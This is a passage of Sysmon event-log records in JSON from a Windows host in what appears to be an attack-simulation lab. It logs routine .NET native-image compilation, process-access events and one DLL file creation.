dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9157,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.013\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00101AE51100}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.013","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00101AE51100}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9158,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-00101AE51100}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-00101AE51100}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9159,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.060\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.060","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9160,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.122\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-001098401000}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.122","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-001098401000}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9161,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.122\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1394-5F25-0000-001098401000}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.122","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1394-5F25-0000-001098401000}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9162,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.138\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-0010E1E81100}\r\nTargetProcessId: 4616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.138","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-0010E1E81100}","TargetProcessId":"4616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9163,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:40.404\r\nProcessGuid: {E2A3D6B1-13CC-5F25-0000-0010E1E81100}\r\nProcessId: 4616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1208-0\\System.Net.Http.dll\r\nCreationUtcTime: 2020-08-01 07:03:40.388","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:40.404","ProcessGuid":"{E2A3D6B1-13CC-5F25-0000-0010E1E81100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1208-0\\System.Net.Http.dll","CreationUtcTime":"2020-08-01 07:03:40.388","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9164,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:40.435\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CC-5F25-0000-001076EC1100}\r\nTargetProcessId: 4324\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:40.435","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CC-5F25-0000-001076EC1100}","TargetProcessId":"4324","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
